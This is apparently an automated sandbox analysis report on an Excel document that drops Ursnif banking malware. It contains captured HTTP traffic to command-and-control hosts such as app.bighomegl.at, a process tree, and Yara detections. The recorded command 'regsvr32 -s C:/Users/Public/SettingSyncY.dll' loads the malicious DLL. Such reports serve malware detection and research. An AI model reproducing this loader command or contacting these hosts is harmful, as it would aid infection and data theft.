                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:09:06 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                4192.168.2.349757185.233.80.3180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jun 11, 2021 05:09:27.597299099 CEST5843OUTGET /1KWgQnO99/jRkbuys9zmBRLf_2Bfsk/j4hnRgNwvnusz6igqqU/69TUSClHMklgWWKD_2F1Zz/rzeT_2BYOFVhf/cyHjXUJp/RmO3IoI8my48PUoCkU_2Bq5/Szeo_2BZSo/JGYOsrFv3PDanQVBJ/aQVxlvGnm7ma/EvG_2Fcbphd/B7D_2FsJViKTei/G4P6ADPlZ3kryG2o13jPZ/lht8TN_2BF0SOOm1/wlXy9yuuvEg2t5t/0qJz6tISKUfXu3ooK_/2B_2FN_2B/Y8QRyMSJiCCXzc8ct_2F/cWxPiUkWHFklqYWaKgD/HT4v_2FZjRB5pDpaTPvsKl/vHhtteYEDrQEo/F_2BGZVP/fKC323Rf/6 HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                Host: app.bighomegl.at
                                                                                                                                                                Jun 11, 2021 05:09:28.119246960 CEST6020INHTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:09:28 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Content-Length: 548
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                HTTPS Packets

                                                                                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                Jun 11, 2021 05:06:40.844886065 CEST50.87.220.158443192.168.2.349714CN=www.quickbooks.aeymotors.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Apr 14 11:12:56 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jul 13 11:12:56 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                Code Manipulations

                                                                                                                                                                Statistics

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                Analysis Process: EXCEL.EXE PID: 5988 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:05:06:36
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                Imagebase:0x310000
                                                                                                                                                                File size:27110184 bytes
                                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: regsvr32.exe PID: 6180 Parent PID: 5988

                                                                                                                                                                General

                                                                                                                                                                Start time:05:06:42
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:regsvr32 -s C:/Users/Public/SettingSyncY.dll
                                                                                                                                                                Imagebase:0xa40000
                                                                                                                                                                File size:20992 bytes
                                                                                                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: iexplore.exe PID: 6412 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:05:07:32
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: iexplore.exe PID: 6436 Parent PID: 6412

                                                                                                                                                                General

                                                                                                                                                                Start time:05:07:33
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: iexplore.exe PID: 5448 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:17
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: iexplore.exe PID: 5724 Parent PID: 5448

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:17
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: iexplore.exe PID: 5308 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:40
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: iexplore.exe PID: 5516 Parent PID: 5308

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:41
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: iexplore.exe PID: 6200 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:05:09:03
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: iexplore.exe PID: 6012 Parent PID: 6200

                                                                                                                                                                General

                                                                                                                                                                Start time:05:09:04
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis

                                                                                                                                                                Reset < >